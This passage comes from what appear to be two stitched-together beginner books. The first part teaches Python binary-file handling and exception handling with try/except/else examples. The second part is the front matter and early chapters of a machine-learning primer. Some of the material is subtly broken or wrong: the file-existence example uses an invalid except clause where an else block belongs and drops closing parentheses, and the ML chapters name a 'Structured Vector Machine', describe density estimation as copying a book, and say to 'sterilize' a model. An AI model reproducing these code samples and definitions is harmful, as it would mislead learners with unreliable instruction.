right, left, up or down a string will be placed and if you want in it
to be centered you write C
Finally, we will have to save the document through the command
output(), and the arguments that will go with them will be the name
of the file (with the ".pdf" included since we want a file in pdf) and
then a string "F".
Managing BIN files
As we saw earlier, not all files are necessarily text files. These
same ones can be processed by lines and even there exist certain
files that when being processed, each byte contains a particular
meaning for the program; for that reason, they need to be
manipulated in their specific format.
A clear example of this are the files in Binary, to work with this
type of files is no more than adding a b in the space of the
parameter mode.
For example:
When we handle a binary file, it is very important to know the
current position of the data we need in order to modify it. If you
don't know the current position, the file.tell() function will indicate
the number of bytes that have elapsed since we started the file.
In case you want to modify the current position in the file, we use
the function file.seek(star, from) which will allow us to move a
certain amount of bytes from start to finish.
Exception Handling
What Is Exception Handling
Exception handling is error management. It has three purposes.

1. It allows you to debug your program.


2. It allows your program to continue running despite
encountering an error or exception.
3. It allows you to create your customized errors that can
help you debug, remove and control some of Python’s
nuances, and make your program function as you want
it to.
Handling the Zero Division Error Exception
Exception handling can be an easy or difficult task depending on
how you want your program to flow and your creativity. You might
have scratched your head because of the word creativity.
Programming is all about logic, right? No.
The core purpose of programming is to solve problems. A solution
to a problem does not only require logic. It also requires creativity.
Have you ever heard of the phrase, “Think outside of the box?”
Program breaking exceptions can be a pain and they are often
called bugs. The solution to such problems is often elusive. And
you need to find a workaround or risk rewriting your program from
scratch.
For example, you have a calculator program with this snippet of
code when you divide:
>>> def div(dividend, divisor):
print(dividend / divisor)
>>> div(5, 0)
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
File "<stdin>", line 2, in div
ZeroDivisionError: division by zero
>>> _
Of course, division by zero is an impossible operation. Because of
that, Python stops the program since it does not know what you
want to do when this is encountered. It does not know any valid
answer or response.
That being said, the problem here is that the error stops your
program entirely. To manage this exception, you have two options.
First, you can make sure to prevent such operation from happening
in your program. Second, you can let the operation and errors
happen, but tell Python to continue your program.
Here is what the first solution looks like:
>>> def div(dividend, divisor):
if (divisor != 0):
print(dividend / divisor)
else:
print("Cannot Divide by Zero.")
>>> div(5, 0)
Cannot Divide by Zero.
>>> _
Here is what the second solution looks like:
>>> def div(dividend, divisor):
try:
print(dividend / divisor)
except:
print("Cannot Divide by Zero.")
>>> div(5, 0)
Cannot Divide by Zero.
>>> _
Remember the two core solutions to errors and exceptions. One,
prevent the error from happening. Two, manage the aftermath of
the error.
Congratulations!
The eight character of the password required to unlock the answer
booklet is letter t.
Using Try-Except Blocks
In the previous example, the try except blocks was used to manage
the error. However, you or your user can still do something to
screw your solution up. For example:
>>> def div(dividend, divisor):
try:
print(dividend / divisor)
except:
print("Cannot Divide by Zero.")
>>> div(5, "a")
Cannot Divide by Zero.
>>> _
The statement prepared for the “except” block is not enough to
justify the error that was created by the input. Dividing a number
by a string does not actually warrant a “Cannot Divide by Zero.”
message.
For this to work, you need to know more about how to use except
block properly. First of all, you can specify the error that it will
capture and respond to by indicating the exact exception. For
example:
>>> def div(dividend, divisor):
try:
print(dividend / divisor)
except ZeroDivisionError:
print("Cannot Divide by Zero.")
>>> div(5, 0)
Cannot Divide by Zero.
>>> div(5, "a")
Traceback (most recent call last):
File "<stdin>", line 1, <module>
File "<stdin>", line 3, in div
TypeError: unsupported operand type(s) for /: 'int' and 'str'
>>> _
Now, the error that will be handled has been specified. When the
program encounters the specified error, it will execute the
statements written on the “except” block that captured it. If no
except block is set to capture other errors, Python will then step in,
stop the program, and give you an exception.
But why did that happen? When the example did not specify the
error, it handled everything. That is correct. When the “except”
block does not have any specified error to look out for, it will
capture any error instead. For example:
>>> def div(dividend, divisor):
try:
print(dividend / divisor)
except:
print("An error happened.")
>>> div(5, 0)
An error happened.
>>> div(5, "a")
An error happened.
>>> _
That is a better way of using the “except” block if you do not know
exactly the error that you might encounter.
Reading an Exception Error Trace Back
The most important part in error handling is to know how to read
the trace back message. It is fairly easy to do. The trace back
message is structured like this:
<Traceback Stack Header>
<File Name>, <Line Number>, <Function/Module>
<Exception>: <Exception Description>
Here are things you need to remember:

The trace back stack header informs you that an error


occurred.
The file name tells you the name of the file where the
fault is located. Since the examples in the book are
coded using the interpreter, it always indicated that the
file name is "<stdin>" or standard input.
The line number tells the exact line number in the file
that caused the error. Since the examples are tested in
the interpreter, it will always say line 1. However, if
the error is found in a code block or module it will
return the line number of the statement relative to the
code block or module.
The function/module part tells what function or
module owns the statement. If the code block does not
have an identifier or the statement is declared outside
code blocks, it will default to <module>.
The exception tells you what kind of error happened.
Some of them are built-in classes (e.g.,
ZeroDivisionError, TypeError, and etcetera) while
some are just errors (e.g., SyntaxError). You can use
them on your except blocks.
The exception description gives you more details with
regards to how the error occurred. The description
format may vary from error to error.

Using exceptions to prevent crashes


Anyway, to know the exceptions that you can use, all you need to
do is to generate the error. For example, using the TypeError found
in the previous example, you can capture that error too and provide
the correct statements in response.
>>> def div(dividend, divisor):
try:
print(dividend / divisor)
except ZeroDivisionError:
print("Cannot Divide by Zero.")
except TypeError:
print("Cannot Divide by Anything Other Than a
Number.")
except:
print("An unknown error has been detected.")
>>> div(5, 0)
Cannot Divide by Zero.
>>> div(5, "a")
Cannot Divide by Anything Other Than a Number.
>>> div(undeclaredVariable / 20)
An unknown error has been detected.
>>> _
However, catching errors this way can still be problematic. It does
allow you to prevent a crash or stop, but you have no idea about
what exactly happened. To know the unknown error, you can use
the as keyword to pass the Exception details to a variable.
Convention wise, the variable detail is often used for this purpose.
For example:
>>> def div(dividend, divisor):
try:
print(dividend / divisor)
except Exception as detail:
print("An error has been detected.")
print(detail)
print("Continuing with the program.")
>>> div(5, 0)
An error has been detected.
division by zero
Continuing with the program.
>>> div(5, "a")
An error has been detected.
unsupported operand type(s) for /: 'int' and 'str'
Continuing with the program.
>>> _
The Else Block
There are times that an error happens in the middle of your code
block. You can catch that error with try and except. However, you
might not want to execute any statement in that code block if an
error happens. For example:
>>> def div(dividend, divisor):
try:
quotient = dividend / divisor
except Exception as detail:
print("An error has been detected.")
print(detail)
print("Continuing with the program.")
print(str(dividend) + " divided by " + str(divisor) + " is:")
print(quotient)
>>> div(4, 2)
4 divided by 2 is:
2.0
>>> div(5, 0)
An error has been detected.
division by zero
Continuing with the program.
5 divided by 0 is:
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
File "<stdin>", line 8, in div
Print(quotient)
UnboundLocalError: local variable 'quotient' referenced before
assignment
>>> _
As you can see, the next statements after the initial fault are
dependent on it thus they are also affected. In this example, the
variable quotient returned an error when used after the try and
except block since its supposed value was not assigned because the
expression assigned to it was impossible to evaluate.
In this case, you would want to drop the remaining statements that
are dependent on the contents of the try clause. To do that, you
must use the else block. For example:
>>> def div(dividend, divisor):
try:
quotient = dividend / divisor
except Exception as detail:
print("An error has been detected.")
print(detail)
print("Continuing with the program.")
else:
print(str(dividend) + " divided by " + str(divisor) + " is:")
print(quotient)
>>> div(4, 2)
4 divided by 2 is:
2
>>> div(5, 0)
An error has been detected.
division by zero
Continuing with the program.
>>> _
The first attempt on using the function with proper arguments went
well.
On the second attempt, the program did not execute the last two
statements under the else block because it returned an error.
The else block always follows except blocks. The function of the
else block is to let Python execute the statements under it when the
try block did not return and let Python ignore them if an exception
happens.
Failing Silently
Silent fails or failing silently is a programming term often used
during error and exception handling.
In a user’s perspective, silent failure is a state wherein a program
fails at a certain point but never informs a user.
In a programmer’s perspective, silent failure is a state wherein the
parser, runtime development environment, or compiler fails to
produce an error or exception and proceed with the program. This
often leads to unintended results.
A programmer can also induce silent failures when he either
ignores exceptions or bypasses them. Alternatively, he blatantly
hides them and creates workarounds to make the program operate
as expected even if an error happened. He might do that because of
multiple reasons such as the error is not program breaking or the
user does not need to know about the error.
Handling the File Not Found Exception Error
There will be times when you will encounter the
FileNotFoundError. Handling such error depends on your intent or
purpose with regards to opening the file. Here are common reasons
you will encounter this error:

You did not pass the directory and filename as a string.


You misspelled the directory and filename.
You did not specify the directory.
You did not include the correct file extension.
The file does not exist.
The first method to handle the FileNotFoundError exception is to
make sure that all the common reasons do not cause it. Once you
do, then you will need to choose the best way to handle the error,
which is completely dependent on the reason you are opening a file
in the first place.
Checking If File Exists
Again, there are always two ways to handle an exception:
preventive and reactive. The preventive method is to check if the
file exists in the first place.
To do that, you will need to use the os (os.py) module that comes
with your Python installation. Then, you can use its path module’s
isfile() function. The path module’s file name depends on the
operating system (posixpath for UNIX, ntpath for Windows,
macpath for old MacOS). For example:
>>> from os import path
>>> path.isfile("random.txt")
False
>>> path.isfile("sampleFile.txt")
True
>>> _
Try and Except
You can also do it the hard way by using try, except, and else
blocks.
>>> def openFile(filename):
try:
x = open(filename, "r")
except FileNotFoundError:
print("The file '" + filename + "' does not exist."
except FileNotFound:
print("The file '" + filename + "' does exist."
>>> openFile("random.txt")
The file 'random.txt' does not exist.
>>> openFile("sampleFile.txt")
The file 'sampleFile.txt' does exist.
>>> _
Creating a New File
If the file does not exist, and your goal is to overwrite any existing
file anyway, then it will be best for you to use the "w" or "w+"
access mode. The access mode creates a new file for you if it does
not exist. For example:
>>> x = open("new.txt", "w")
>>> x.tell()
0
>>> _
If you are going to read and write, use "w+" access mode instead.
Practice Exercise
Try to break your Python by discovering at least ten different
exceptions.
After that, create a loop.
In the loop, create ten statements that will create each of the ten
different exceptions that you find inside one try block.
Each time the loop loops, the next statement after the one that
triggered an exception should trigger another and so on.
Provide a specific except block for each one of the errors.
Summary
Exception handling skills are a must learn for beginners. It teaches
you how to predict, prevent, and manage exceptions. It allows you
to test and debug your program and generate compromises with
your skill, program, and system’s limits.
That being said, you have made great strides to get this far and I
commend you!
Tips and Tricks for Success
We’ve reached the end of this book. You’ve been introduced to
Python’s main topics and written some programs. What’s next?
How do you keep improving and mastering the Python language?
Here are some tips for success that keep you on the right path:
Code everyday
Practice makes perfect. When learning a new language like
Chinese or Spanish, experts recommend you use it every day in the
form of speaking and going through an exercise or so. It’s no
different with a programming language. The more you practice, the
more the basic syntax will become second nature to you, and you’ll
instinctively know when to use concepts like conditionals and
loops. There are lots of resources (which you find in the appendix)
that provide exercises and sample programs you can work on right
away.
Write by hand
When you’re taking notes (and you should take notes), write them
out by hand. Studies show that the process of taking physical pen to
physical paper facilitates the best long-term memory retention.
Writing by hand includes writing code by hand, and then checking
it on your computer, so you know for sure if it’s accurate.
Outlining code and ideas this way can help you stay organized, as
well, before starting to actually build a program.
Find other beginners
Learning to code by yourself can get boring and frustrating. One of
the best ways to learn and improve is to find others who are in the
same phase as you. You can bounce ideas off each other, help out
on projects, and more. If you don’t know anyone in your immediate
circle, you can check out groups online and/or find local events
through Meetups and Facebook. Always exercise caution and
employ safe practices when first meeting people you only know
online. Stick to public places during daylight hours, and don’t go
anywhere alone with someone you don’t know well until you feel
comfortable.
Try explaining Python out loud
Sometimes explaining something you just learned to someone is
the best way to really cement it into your mind. It allows you to
reframe concepts into your own words. You don’t even have to talk
to a real person; it can be an inanimate object. This is such a
common practice among programmers that it’s known as “rubber
duck debugging,” which references talking to a rubber duck about
bugs in a program. Pick a topic in Python like conditionals or
variables, and see if you can explain it. If you have trouble or
realize there’s a gap in your knowledge, it’s time to go back and
keep learning.
Check out other languages
This book is about Python, so obviously we believe that should be
your priority, but getting to know a little bit about other languages
can be very helpful, too. It will definitely make you a better
programmer in the future. Checking out other languages can help
you discover what common architecture is built into every
language as well as the differences between them and Python. Even
if you just read about other languages and never write much code
in anything besides Python, you’ll be improving your knowledge
and skill.
Have a plan for when you get stuck
When you get stuck while coding, take a step back. What are you
trying to get the code to do? What have you tried? And what’s
happening? Write the answers down and be as specific and detailed
as possible. Then, you can go to someone else for help, and you
won’t have to spend a ton of time trying to explain the problem.
The answers are also really useful just for your own thought
process. Take a close look at any error messages you’re getting.
Work your way backward to try and spot any mistakes.
Another response to getting stuck is to just start over. If your code
is really long, it can be discouraging to start from scratch, but that
means you don’t have to go through the whole thing, picking it
apart and wearing out your eyes. Starting over may actually be
easier.
Take a break
Whether you choose to begin again or go through the code with a
fine-toothed comb, you should take breaks. When you work on a
problem for too long, your brain gets stuck in a groove, and it’s
difficult to come up with new solutions. Go do something that
doesn’t use the exact same muscles as coding. Exercise your body
instead, take a long shower, lie down for a nap, or bake some
cookies. Einstein would often come up with solutions to his
problems while he played the violin, and who doesn’t want to think
a little bit like Einstein?
Conclusion
Learning how to get started with computer programming may seem
like a large challenge. You can go with many distinct programming
alternatives, but many of them are difficult to learn, will take some
time to figure out, and will not always do all the things you need.
Many people are afraid they need to be smart or have a lot of
education and coding experience before they can make it to the
level of coding they want. But, even a beginner may get into
programming with Python.
Whether you're a beginner or have been in this field for some time,
Python has made it so easy to code. The language is English-based,
so it's simple to read, and it's got rid of many of the other symbols
that make coding difficult for others to read. And since it's a user
domain, to make things easier, as anyone can make changes and
see other codes.
Keep in mind that, if you have any questions that may not have
been answered in this book, you can always visit the Python
website! The Python website contains a lot of material that will
help you work with Python and ensure that you are entering your
code properly. You can also find any updates that you may need for
your Python program in the event that your program is not updating
properly or you need another version of it.
You can work with the program and teach it what you want it to do,
and you may even be able to help someone else out if they are not
able to get the program to do what they want it to do!
Just remember that you do not need to worry if your Python code
doesn’t work the first time because using Python takes a lot of
practice. The more you practice, the better your code will look, and
the better it will be executed. Not only that, but you will get to see
Machine Learning in action each time you enter your code!
PYTHON MACHINE LEARNING:
THE ABSOLUTE BEGINNER’S
GUIDE FOR UNDERSTAND
NEURAL NETWORK,
ARTIFICIAL INTELLIGENT,
DEEP LEARNING AND
MASTERING THE
FUNDAMENTALS OF ML WITH
PYTHON.

JOHN S. CODE

© Copyright 2019 - All rights reserved.


The content contained within this book may not be reproduced,
duplicated or transmitted without direct written permission from
the author or the publisher.
Under no circumstances will any blame or legal responsibility be
held against the publisher, or author, for any damages, reparation,
or monetary loss due to the information contained within this book.
Either directly or indirectly.
Legal Notice:
This book is copyright protected. This book is only for personal
use. You cannot amend, distribute, sell, use, quote or paraphrase
any part, or the content within this book, without the consent of the
author or publisher.
Disclaimer Notice:
Please note the information contained within this document is for
educational and entertainment purposes only. All effort has been
executed to present accurate, up to date, and reliable, complete
information. No warranties of any kind are declared or implied.
Readers acknowledge that the author is not engaging in the
rendering of legal, financial, medical or professional advice. The
content within this book has been derived from various sources.
Please consult a licensed professional before attempting any
techniques outlined in this book.
By reading this document, the reader agrees that under no circumstances is
the author responsible for any losses, direct or indirect, which are incurred as
a result of the use of information contained within this document, including,
but not limited to, — errors, omissions, or inaccuracies.
Table of Contents
Introduction
Chapter 1 What is Machine Learning
Chapter 2 Applications of Machine Learning
Chapter 3 Big Data and Machine Learning
Chapter 4 Types Of Machine Learning
Chapter 5 How Does Machine Learning Compare to AI
Chapter 6 Hands on with Python
Chapter 7 What Is Python, and How Do I Use It?
Chapter 8 Machine Learning Algorithms
Chapter 9 Essential Libraries for Machine Learning in Python
Chapter 10 Artificial Neural Networks
Chapter 11 Data Science
Chapter 12 A Quick Look At Deep Learning
Conclusion
Introduction
The mention of developers and programming usually has a lot of people
directing their thoughts to the wider study of computer science. Computer
science is a wide area of study. In machine learning, computers learn from
experience, aided by algorithms. To aid their cause, they must use data with
specific features and attributes. This is how they identify patterns that we can
use to help in making important decisions. In machine learning, assignments
are grouped under different categories, such as predictive modeling and
clustering models. The concept behind machine learning is to provide
solutions to pertinent problems without necessarily waiting for direct human
interaction.
Human beings are known to learn from their experiences. Consider a
situation in which you are learning to read or speak a new language. You will
show an improvement with time. Machine learning was borrowed from the
concept of learning exhibited by human beings. When computer systems are
exposed to the same situation repeatedly, they can show an improvement in
the way they respond to that situation with time. Machine learning typically
relies on data. It involves the design and development of computer systems
that can extract patterns, trends, and relationships between various variables
in a dataset. Such knowledge can then be used to predict what will happen in
the future.
Enjoy reading!
Chapter 1 What is Machine Learning
The first topic that we need to take a look at in this guidebook is machine
learning. This is basically a process where you are trying to teach a computer
or another machine how to use its own experiences with a particular user, and
some of the things it has seen in the past, to help it perform even better in the
future. There are a lot of examples of how this can work, such as voice
recognition devices, and even with search engines.
As we go through this guidebook, you will find that there are a lot of
different methods and algorithms that you can use with machine learning in
order to get the machine to learn, but the one you choose really depends on
the kind of results you want to get and the project that you decide to work
with.
Machine learning is going to be a method of data analysis that is able to
automate the process of building analytical models. It is also a branch of
artificial intelligence that is going to be based on the whole idea that a system
is able to learn from the data it is presented, it can identify the patterns that
are there, and it is even able to make its own decisions without a lot of
intervention from humans in the process.
Because of all the new computing technologies that are out there, machine
learning, as we know it today, is not really the same as the machine learning
that we see in the past. It was born out of a form recognition for patterns and
the idea of how a computer is able to actually learn, without a programmer
there, to ensure it performs a task specifically. Researchers who were
interested in some of the things that we are able to do with artificial
intelligence wanted to also see if their machines were able to learn from data
that it was fed.
The iterative aspect that comes with this machine learning should be seen as
an important programming tool because as we expose any of the models we
create from this learning to new data, the model is then able to adapt on their
own and independently. The machine is going to be able to learn what has
happened to it in the past, and the examples it was given, in order to make
accurate and reliable predictions in the future.
In recent years, there has been a resurgence in the amount of interest that is
out there with machine learning thanks to a few different factors. In
particular, some things like Bayesian analysis and data mining are growing in
popularity as well, and in the process, machine learning is going to be used
more now than ever before.
All of these things mean that it is now easier and faster in order to
automatically produce models with machine learning. And these models are
now able to analyze bigger and more complex data, while also delivering
results faster and results that are more accurate, even when this is done on a
very large scale. And because all of this is able to come together and build
models that are more precise, and organization is going to set itself up for
identifying profitable opportunities better than before, while also avoiding
more of those unknown risks ahead of time. This all comes together to help a
company to become more competitive in the market.
There are a few things that need to come together in order to make sure that
the system you use in machine learning is actually good. Some of these will
include:

1. Ensemble modeling
2. Scalability
3. Iterative and automation processes
4. Algorithms, a good combination of basic and advanced ones
5. Data preparation capabilities.
The neat thing about working with machine learning is that almost every
industry is able to use it. And it is still relatively new when it comes to the
world of technology, so even the amazing things that have been done with it
so far is just the beginning, and it is believed that this kind of technology is
going to be able to do even more things in the process.
Machine learning is likely to grow quite a bit as time goes on. Right now, a
lot of companies are using it in order to figure out what the data they are
receiving is telling them, to figure out how they are able to make better
business decisions over time, rather than having to make the decisions on
their own, and to find some of the patterns that are hidden in the data, and
that a human would not be able to go through.
But this is just the start of what we are able to do when it comes to machine
learning. There are a ton of other applications, and what we are able to do
with this right now is just the beginning. As more people and developers start
to work with machine learning and start to add in some of the Python
languages with it, it is likely that more and more applications are going to be
available as well.
Most of the industries that are out there that re already working with large
amounts of data are going to be able to recognize the kind of value that they
would get with using the technology that comes with machine learning. By
being able to actually get through this data and glean some good insights
from it, and being able to do this close to real-time, the company is then able
to work in a more efficient manner in order to gain a big advantage of others
in their same industry.
And this is the beauty of working with machine learning. We are able to do
things that may have seemed impossible in the past are possible now with the
help of machine learning. Businesses that are handling more data than ever
before are finding the value of working with machine learning to help them
get their work done. They can get through this information faster than would
be possible with a person looking through it on their own and can give them
that competitive edge over others.
There are a lot of different companies that will be able to benefit from a
program that can run on machine learning. Some of the different industries
that are already using this kind of technology will include financial services,
government, health care, retail, oil and gas, transportation, and more.
Machine learning is similar to artificial intelligence that is going to allow a
computer to learn, similar to what we are seeing with the human mind as
well. With a minimal amount of supervision from a person, the machine will
be able to automate a lot of tasks, find the information that you want, and get
to some insights and predictions that you may not be able to find in other
methods on your own. And this guidebook is going to spend some time
looking at how you are able to do this type of machine learning with the help
of the Python coding language so you can start some of your own projects in
no time.
Chapter 2 Applications of Machine Learning
Machine learning helps to change how businesses work and operate in
today’s world. Through machine learning, large volumes of data can be
extracted, which makes it easier for the user to draw some predictions from a
data set.
There are numerous manual tasks that one cannot complete within a
stipulated time frame if the task includes the analysis of large volumes of
data. Machine learning is the solution to such issues. In the modern world, we
are overwrought with large volumes of data and information, and there is no
way a human being can process that information. Therefore, there is a need to
automate such processes, and machine learning helps with that.
When any analysis or discovery is automated fully, it will become easier to
obtain the necessary information from that analysis. This will also help the
engineer automate any future processes. The world of business analytics, data
science, and big data requires machine learning and deep learning. Business
intelligence and predictive learning are no longer restricted to just large
businesses but are accessible to small companies and businesses too. This
allows a small business to utilize the information that it has collected
effectively. This section covers some of the applications of machine learning
in the real world.
Virtual Personal Assistants
Some examples of virtual assistants are Allo, Google Now, Siri and Alexa.
These tools help users access necessary information through voice
commands. All you must do is activate the assistant, and you can ask the
machine any questions you want.
Your personal assistant will look for the necessary information based on your
question, and then provide you with an answer. You can also use this
assistant to perform regular tasks like setting reminders or alarms. Machine
learning is an important part of this tool since it helps the system gather the
necessary information to provide you with an answer.
Density Estimation
Machine learning will help a system use any data that is available on the
Internet, and it can use that data to predict or suggest some information to
users. For example, if you want to purchase a copy of “A Song of Ice and
Fire” from a bookstore, and run it through a machine, you can generate a
similar copy of the book using that very machine.
Latent Variables
When you work with latent variables, the machine will try to identify if these
variables are related to other data points and variables within the data set.
This is a handy method when you use a data set where it is difficult to
identify the relationship between different variables. There are times when
you will be unable to identify why there is a change in a variable. The
engineer can understand the data better if he or she can take a look at the
different latent variables within the data set.
Reduction of Dimensionality
The data set that is used to train machines to predict the outcome to any
problem will have some dimensions and variables. If there are over three
dimensions within the data set, it will become impossible for the human mind
to visualize or understand that data. In these situations, it is always good to
have a machine learning model to reduce the volume of the data into smaller
segments that are easily manageable. This will help the user identify the
relationships that exist within the data set.
Every machine learning model will ensure that the machine learns from the
data that is provided to it. The machine can then be used to classify data or
predict the outcome or the result for a specific problem. It can also be used in
numerous applications like self-driving cars. Machine learning models help
to improve the ability of smartphones to recognize the user’s face or the way
in which Google Home or Alexa can recognize your accent and voice and
how the accuracy of the machines improves if they have been learning for
longer.
Steps in Building a Machine Learning System
Regardless of the type of model that you are trying to build or the problem
that you are trying to solve, you will follow the steps mentioned in this
section while building a machine learning algorithm.
Define Objective
The first step, as it is with any other task that you perform, is to define the
purpose or the objective you want to accomplish using your system. This is
an important step since the data you will collect, the algorithm you use, and
many other factors depend on this objective.
Collect Data
Once you have your objective in mind, you should collect the required data.
It is a time-consuming process, but it is the next important step that you must
achieve. You should collect the relevant data and ensure that it is the right
data for the problem you are trying to solve.
Prepare Data
This is another important step, but engineers often overlook it. If you do
overlook this step, you will be making a mistake. It is only when the input
data is clean and relevant that you will obtain an accurate result or prediction.

Select Algorithm
Numerous algorithms can be used to solve a problem, including Structured
Vector Machine (SVM), k-nearest, Naive-Bayes and Apriori, etc. You must
choose the algorithm that best suits the objective.
Train Model
When your data set is ready, you should feed it into the system and help the
machine learn using the chosen algorithm.
Test Model
When your model is trained, and you believe that it has provided the relevant
results, you can test the accuracy of the model using a test data set.
Predict
The model will perform numerous iterations with the training data set and the
test data set. You can look at the predictions and provide feedback to the
model to help it improve the predictions that it makes.
Deploy
Once you have tested the model and are happy with how it works, you can
sterilize that model and integrate it into any application that you want to use.
This means that the model that you have developed can now be deployed.
The steps followed will vary depending on the type of application and
algorithm that you are using. You can choose to use a supervised or
unsupervised machine learning algorithm. The steps mentioned in this section
are often the steps followed by most engineers when they are developing a
machine learning algorithm. There are numerous tools and functions that you
can use to build a machine learning model. This book will help you with
understanding more about how you can design a machine learning model
using Python.
Chapter 3 Big Data and Machine Learning
In order to learn something, a system that is capable of machine learning
needs to be exposed to a lot of data. Going back several decades, computers
didn’t have access to all that much data, in comparison to what they can
access today. Computers were slow and quite awkward. Most data at that
time was stored on paper, and so it was not readily accessed by computer
systems. There was also far less of it. Of course, companies and large
businesses, along with governments have always collected as much data as
they could, but when you don’t have that much data and it’s mostly in the
form of paper records, then you don’t have much data that is useful to a
machine learning computer system.
The first databases were invented in the late 1960s. A database is not really
what we think of when considering the relationship between data and
machine learning, although it could be in some circumstances. Databases
collect very organized information. To understand the difference, think about
a collection of Facebook posts, versus a record of someone registering to
enroll at a university. The collection of Facebook posts is going to be
disorganized and messy. It is going to have data of different types, such as
photos, videos, links, and text. It’s going to be pretty well unclassified,
maybe only marked by who posted it and the date.
In contrast, when you say database you should think completely organized
and restricted data. A database is composed of individual records, each record
containing the same data fields. At a university, students when enrolled might
enter their name, social security or ID number, address, and so on.
All of these records are stored in the same format, together in one big file.
The file can then be “queried” to return records that we ask for. For example,
we could have it return records for everyone in the Freshman class.
Relational databases allow you to cross reference information and bring it
together in a query. Following our example, you could have a separate
database that had the courses each student was taking. This could be stored in
a separate database from the basic information of each student, but it could be
cross referenced using a field as a student ID.
Tools were developed to help bring data together from different databases.
IBM, a company that always seems to figure large in many developments in
computer science, developed the first structured query language or SQL, that
could be used to do tasks like this. Once data could be pulled together, it
could be analyzed or used to do things like print out reports for human
operators.
As computers became more ubiquitous, companies and government agencies
began collecting more and more data. But it wasn’t until the late 1990s that
the amount of data and types of data began to explode. There were two
developments that led to these changes. The first was the invention of the
internet. The second was the development of ever improving and lower cost
computer storage capacity.
The development and commercialization of the internet meant that over a
very short time period, nearly everyone was getting “online”. Businesses
moved fast to get online with websites. Those that didn’t fall behind, and
many ended up going out of business. But that isn’t what’s important for our
purposes. The key here is that once people got online, they were leaving data
trails all over the place.
This kind of data collection was increasing in the offline world as well, as
computing power started to grow. For example, grocery stores started
offering supposed discount and membership cards, that really functioned to
track what people were buying, so that the companies could make customized
offers to customers, and so they could adjust their marketing plans and so
forth.
The internet also brought the concept of cloud computing to the forefront.
Rather than having a single computer, or a network of computers in one
office, the internet offered the possibility of harnessing the power of multiple
computers linked together both for information processing and doing
calculations and also for simple data storage.
A third development, the continual decline in the costs of storage components
of computer systems along with increased capacity had a large impact in this
area. Soon, more and more data was being collected. Large companies like
Google, and eventually Facebook, also started collecting large amounts of
data on people’s behavior.
This is where machine learning hits the road. For the first time, the amounts
of data that machine learning systems needed to be able to perform real world
tasks, not just do things like playing checkers, became possible. Machine
learning systems are trained on data sets, and now businesses (and
governments) had data of all kinds to train machine learning systems to do
many different tasks.
Goals and Applications of Machine Learning
Machine learning is something that can be applied whenever there is a useful
pattern in any large data set. In many cases, it is not known what patterns
exist before the data has been fed to a machine learning system. This is
because human beings are not able to see the underlying pattern in large data
sets, but computers are well suited to finding them. The types of patterns are
not limited in any way. For example, a machine learning system can be used
to detect hacking attempts on a computer network. It can be trained for
network security by feeding the system past data that includes previous
hacking attempts.

In another case, a machine learning system can be used to develop facial


recognition technology. The system can be presented with large numbers of
photographs that contain faces, so that it can learn to spot faces, and to
associate a given face with a particular individual.
Now let’s consider another application of machine learning, which is
completely different from the other two we’ve looked at so far. Machine
learning can be used to approve or disapprove a loan application. During the
training phase, the system will be exposed to a large number of previous loan
applications and the ultimate results. In other words, did the borrower pay the
loan off early or default on the loan? During the exposure to all the data, the
system will learn what characteristics or combinations of characteristics best
predict whether or not a given applicant is going to default on a loan. This is
all done without human input, and so the machine may find patterns in the
data that human observers missed and never suspected were there. The fact is
that human minds are not very good at being able to analyze large data sets,
and some would probably argue that we can’t do it at all.
One of the earliest applications of machine learning was in the detection of
email spam. This is a good example to look at, because it illustrates a
particular type of problem that machine learning systems are good at solving.
Determining whether or not an email is spam or not is something that can be
framed as a classification problem. In other words, you take each email,
examine it, and classify it as spam or not spam. This is not something that can
be taken to be absolute, and detecting all spam messages can be tricky.
Fraud detection with credit and debit cards is yet another application of
machine learning. By studying past data, the system can learn to detect
patterns in usage that indicate that the card is being used in a fraudulent
manner. In many cases, the patterns that are detected are going to be things
that human observers are completely unaware of, or wouldn’t associate with
fraud detection even if they knew the patterns existed.
So, we see that machine learning can be applied in virtually any situation
where there is a large amount of data available, and there are patterns in the
data that can be used for the purposes of detection or prediction. Machine
learning is quite general, able to learn anything from playing chess to spotting
fuel waste for an airline like Southwest. This is not the artificial intelligence
that was once imagined by science fiction writers in the 1960s or 1970s, but it
does have many characteristics of human learning. The first is that it’s quite
general. The second is that it will perform better, the more data that it is
exposed to.
Now let’s consider the goals of machine learning. The central goal of
machine learning is to develop general purpose algorithms that can solve
problems using intelligence and learning.
Obviously one important goal of machine learning is to increase productivity.
This is true whether or not the user of the system is a business, a military
branch, or a government agency.
The second goal is to replace human labor with better machine labor. Of
course, this has been a goal of technology ever since the industrial revolution
started, and it continues to be an important goal today. However, the way that
this is being done in the case of machine learning is a little bit different. The
first thing is using machine learning to perform tasks that require a level of
attention and focus that human beings are not able to provide. Even when
humans are excellent workers who will provide maximum focus, a human
suffers from many flaws, like fatigue, and the ability to be distracted. Also,
the amount of information that a human observer can pay attention to at any
given time is very limited. Consider a machine learning system instead–focus
is never an issue. A computer system is able to generate laser-like focus in a
way that a human being never could. Second, it is able to analyze and sample
a far larger data set, and of course it will never be subject to fatigue and it’s
not going to need restroom breaks or lunch.
One application–in a general sense–that is being used in many businesses
today is using machine learning to spot waste. Several large corporations
have already had great success with this. We’ve already mentioned one,
Southwest Airlines famously used machine learning to analyze the activity of
airlines on the tarmac, and they found a great deal of waste in terms of time
and fuel was spent by planes idling on the tarmac. UPS has also used
machine learning to spot wasteful driving routes that cost the company time
and money, at the expense of having thousands of trucks waste gallons of
fuel. Machine learning can also be applied to find out what employees are
doing and how they can better use their time.
Benefits of Machine Learning
There are a large number of benefits for businesses that use machine learning.
We can summarize a few of them here:

Machine learning can easily find patterns in any underlying


data set.
Systems based on machine learning get better with experience.
The more data they see, the better they are going to get.
Machine learning is quite general, and can be applied to nearly
any application, from detecting hacking attempts on a computer
network to picking winning stocks.
Machine learning systems can handle multidimensional
problems that would overwhelm human observers.
Once a system has gone through the learning phase, further
human intervention is not required. This is a true system that
uses automation.
Machine learning can be applied across a broad spectrum, and
it can be used to solve nearly any problem that a business may
encounter.
How Machine Learning Works
Machine learning begins with a human guide in the form of a data scientist. A
problem has to be identified that a machine learning algorithm can be used to
solve it. In order for the process to work, there must be a significant amount
of data that can be used to train the system before it is deployed in the real
world. There are two basic ways that machine learning can proceed. They are
called supervised and unsupervised learning.
In the training phase, the data scientist will select appropriate training data,
and expose the system to the data. As the system is exposed to data, it will
modify itself in order to become more accurate. This phase is a crucial part of
a development with the system, and the data scientist must choose the right
data set for the problem at hand. In other words, the impression that human
